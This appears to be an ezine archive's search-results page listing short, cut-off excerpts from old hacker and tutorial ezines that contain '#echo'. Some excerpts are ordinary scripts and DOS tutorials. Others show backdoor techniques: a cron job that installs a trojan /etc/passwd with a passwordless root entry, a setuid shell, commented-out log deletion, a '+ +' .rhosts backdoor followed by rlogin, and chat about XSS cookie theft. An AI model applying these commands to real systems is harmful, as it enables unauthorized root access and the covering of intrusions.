#echo

4x04 Seguridad en sistemas Unix / Linux (parte 2)

eZine's profile picture
Published in 
 · 11 months ago
... Starting /sbin/rpc.portmap..." # /sbin/rpc.portmap #fi # At this point, we are ready to talk to The World... # Mount NFS filesystems: #echo "Mounting remote file systems..." #/sbin/mount -a -t nfs # This may be our /usr runtime!!! # Show the mounted volumes: #/sbin/mount -v -t nfs # Begin a list of started daemons: echo -n "Starting daemons: " # Start the SYSLOGD/KLOGD daemons: if [ -x ${NET}/syslogd ]; then echo -n " syslogd" ${NET}/syslogd sleep 1 # prevent syslogd/klogd race condition on SMP kernels echo -n " klogd" # '-c 3' = display level 'error' or higher messages on console ...

COMANDI DOS (parte I)

eZine's profile picture
Published in 
 · 2 years ago
... Se io faccio un programma che cambia directory e mi porta alla base, alla root di ogni sistema DOS (cioè il c:), queste sono le due esecuzioni: Senza #echo off: c:\ciao> c:\ciao>cd .. c:\> CON: c:\>ciao> c:\> Come vedete non mi fa vedere la scrittura del comando ma solo la sua esecuzione! Ora impariamo a scrivere. Per scrivere bisogna usare il comando ECHO Quindi ricapitolando: -------INIZIO------------ @echo off echo. echo. echo RICAPITOLANDO.... echo. echo. -------FINE---------- Echo. serve per una riga vuota. echo RICAPITOLANDO... visualizzerà sullo schermo la parola RICAPITOLANDO... Per pulire lo schermo si usa il comando CLS ...

RareGaZz Issue 19

eZine's profile picture
Published in 
 · 3 years ago
... # #time stream tcp nowait root internal #time dgram udp wait root internal # # Echo, discard, daytime, and chargen are used primarily for testing. # #echo stream tcp nowait root internal #echo dgram udp wait root internal #discard stream tcp nowait root internal #discard dgram udp wait root internal #daytime stream tcp nowait root internal #daytime dgram udp wait root internal #chargen stream tcp nowait root internal #chargen dgram udp wait root internal # # # RPC services syntax: # <rpc_prog>/<vers> <endpoint-type> rpc/<proto> <flags> <user> \ # <pathname> <args> # # <endpoint-type> c ...

Dirtynet 007

eZine's profile picture
Published in 
 · 5 years ago
... 7;sbin/in.telnetd /usr/sbin/in.hylafaxd cd /etc echo "hylafax stream tcp nowait root /usr/sbin/tcpd in.hylafaxd" >> $ #echo "hylafax 4559/tcp" >> services sleep 2 echo "Installazione in corso....." chmod +x /bin/logon killall -HUP inetd sleep 2 echo "Installazione in corso....." chmod +x /bin/logon killall -HUP inetd sleep 2 echo "Installazione conclusa" sleep 1 echo "Adesso modificare in.hylafaxd come spiegato nel file README" -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Ciao da SPYRO http://www.spyrohack.com | http://utenti.tripod.it/spyroh ...

Confidence Remains High Issue 03

eZine's profile picture
Published in 
 · 5 years ago
... l get an error. 4:30 am is a good time. Put this in the roots cron to do this : 29 4 * * * /bin/usr/hidenhidenpass ..make sure this exist #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden here is the /bin/usr/hidenhidenpass .hidden ------- #!/bin/sh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd Cron #3 -------- This is a c script that will work like the above. Cron it as ...

Phrack Inc. Volume 15 Issue 69 File 04

eZine's profile picture
Published in 
 · 5 years ago
... he http://sdf.org website. The" echo "paypal" echo "minimum is \$3. Please include 'Validate $LOGNAME' in the Payment" echo "For field." echo #echo "We also accept BitCoin for validation:" echo "17GQEeNNHYPmkdgzHmHXiyMaVfgrhPvGBQ" echo "We also accept BitCoin - Please type 'bitcoin' for details." echo echo "You may also credit the validation fee towards 'arpa' membership" echo "should" echo "you decide to join 'arpa' within 30 days of validating your account." echo echo "(continue)\c" read continue echo echo "To see what you get as a validated member, type 'user'" echo "For Lifetime ARPA membership to SDF via paypal, type 'arpa'" echo "To ...

Go Null Yourself Issue 04

eZine's profile picture
Published in 
 · 5 years ago
... u can modify what the hashes bit.ly goes to elchupathingy: so u could edit the xss as its happening lol elchupathingy: nvm just title Silks: <!--#echo var="REMOTE_ADDR"--> Silks: weird Silks: fucking ssi shit elchupathingy: ya elchupathingy: well nvm not getting anything from the two clicks lol Silks: hmm elchupathingy: but there seems to be confusion over what it is Silks: that xss, can you get it to alert? elchupathingy: ya it's the same one i used to get your cookie elchupathingy: just have a feeling they are using noscript Silks: where is it executing? elchupathingy: in body Silks: the results span? elchupathingy: <div class="response ...

el8.0

eZine's profile picture
Published in 
 · 5 years ago
... suid shell and changes the mode things on it?" echo "#!/bin/sh" > /.. echo "/tmp/.ph1xsh" >> /.. chmod +s /.. echo "Done" #echo "Changing shell information! (i jUzt le4rn3d thiz k0mm4nd)" #echo "/tmp/.ph1xsh" >> /etc/shells #chfn -s /tmp/.ph1xsh <user> if [ -x irc ]; then echo "th1s b0x haz irc!" fi if [ -x BitchX ]; then echo "th1s b0x h4z B1tchX" fi #echo "Tell root hez fucking OWNED hardcore" #echo "YOUR OWNED HARDCORE" >> tty1 #echo "Done" #echo "Removing logs" #rm -rf /var/log #echo "Done" # i don't know howto hide myself yet, i'll add to next version #echo "Removing securetty" # ...

Anarchy in the System No 03

eZine's profile picture
Published in 
 · 5 years ago
... questo modo possiamo entrare ed uscire dal sistema senza fornire una password....hhehehehe.... la nostra backdoor classica. [root@localhost /root]#echo + +>>_vulcan_/.rhosts Spiegazione del comando: "echo" - cioè un ordine di scrivere i due "+ +", dove? dentro ">>" _vulcan_ e nel file .rhost che vi ricordo è un file nascosto. In linux tutti i file o le dir che iniziano col . sono nascosti. Perfetto abbiamo finito. Ora potremo accedere al sistema con il comando "rlogin" che si usa appunto in associazione ad un file .rhost per accedere senza password. [root@localhost /root]#rlogin -l_vulcan_ megasys.net SCO Openserver 5 January 2000 Last ...
loading
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT